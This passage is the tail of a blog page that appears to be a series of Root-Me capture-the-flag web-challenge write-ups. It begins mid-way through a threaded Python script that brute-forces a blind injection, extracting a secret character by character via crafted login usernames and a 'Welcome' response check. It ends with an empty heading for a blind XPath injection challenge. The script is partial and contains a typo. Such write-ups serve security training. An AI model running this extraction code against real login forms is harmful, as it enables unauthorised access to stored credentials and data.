--+&quot;.format(k,j,i)</span><br><span class="line">    print(username)</span><br><span class="line">    data=&#123;&quot;username&quot;:username,&quot;password&quot;:&#x27;1&#x27;&#125;</span><br><span class="line">    </span><br><span class="line">    page = &#x27;&#x27;</span><br><span class="line">    while page == &#x27;&#x27;:</span><br><span class="line">        try:</span><br><span class="line">            page = requests.post(url,data=data)</span><br><span class="line">            break</span><br><span class="line">        except:</span><br><span class="line">            print(&quot;Connection refused by the server..&quot;)</span><br><span class="line">            print(&quot;Let me sleep for 5 seconds&quot;)</span><br><span class="line">            print(&quot;ZZzzzz...&quot;)</span><br><span class="line">            time.sleep(5)</span><br><span class="line">            print(&quot;Was a nice sleep, now let me continue...&quot;)</span><br><span class="line">            continue</span><br><span class="line">    </span><br><span class="line">    if &#x27;Welcome&#x27; in page.text:</span><br><span class="line">        payload+=i</span><br><span class="line">        print(payload)</span><br><span class="line">        next=True</span><br><span class="line">q=queue.Queue(5)</span><br><span class="line">for i in range(5):</span><br><span class="line">        thread=myThread(work,q)</span><br><span class="line">        thread.start()</span><br><span class="line">        #threads.append(thread)</span><br><span class="line">&#x27;&#x27;&#x27;for j in range(1,100):</span><br><span class="line">    if next==True:</span><br><span class="line">        next=False</span><br><span class="line">    for i in string.printable[:-5]:</span><br><span class="line">        if next==False:</span><br><span class="line">            q.put([i,j])</span><br><span class="line">            #print(&quot;&#123;&#125; is put&quot;.format(j))</span><br><span class="line">        else:</span><br><span class="line">            next=False</span><br><span class="line">            break</span><br><span class="line">q.join()&#x27;&#x27;&#x27;</span><br><span class="line">for k in range(1,5):</span><br><span class="line">    for j in range(1,100):</span><br><span class="line">        if next==True:</span><br><span class="line">            next=False</span><br><span class="line">        for i in string.printable[:-5]:</span><br><span class="line">            if next==False:</span><br><span class="line">                q.put([i,j,k])</span><br><span class="line">                #print(&quot;&#123;&#125; is put&quot;.format(j))</span><br><span class="line">            else:</span><br><span class="line">                next=False</span><br><span class="line">                break</span><br><span class="line">    q.jojn()</span><br></pre></td></tr></table></figure>

<h2 id="54-XPath-injection-blind"><a href="#54-XPath-injection-blind" class="headerlink" title="54.XPath injection - blind"></a>54.XPath injection - blind</h2><p>[+]URL:<a target="_blank" rel="noopener" href="http://challenge01.root-me.org/web-serveur/ch24/" title="http://challenge01.root-me.org/web-serveur/ch24/">http://challenge01.root-me.org/web-serveur/ch24/</a></p>

        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>
        <div id="lv-container"></div>
        <div class="giscus"></div>
    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <span id="busuanzi_container_site_pv">
            <span id="busuanzi_value_site_pv"></span>PV
        </span>
        <span id="busuanzi_container_site_uv">
            <span id="busuanzi_value_site_uv"></span>UV
        </span>
        Created By <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>  Theme <a target="_blank" rel="noopener" href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "search.json"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

<script src="/js/index.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




    <script src="https://giscus.app/client.js"
    data-repo="YYHYlh/YYHYlh.github.io"
    data-repo-id="R_kgDOJjKWvw"
    data-category="Announcements"
    data-category-id="DIC_kwDOJjKWv84CWs3N"
    data-mapping="pathname"
    data-strict="0"
    data-reactions-enabled="1"
    data-emit-metadata="0"
    data-input-position="bottom"
    data-theme="preferred_color_scheme"
    data-lang="zh-CN"
    crossorigin="anonymous"
    async>
</script>




</html>
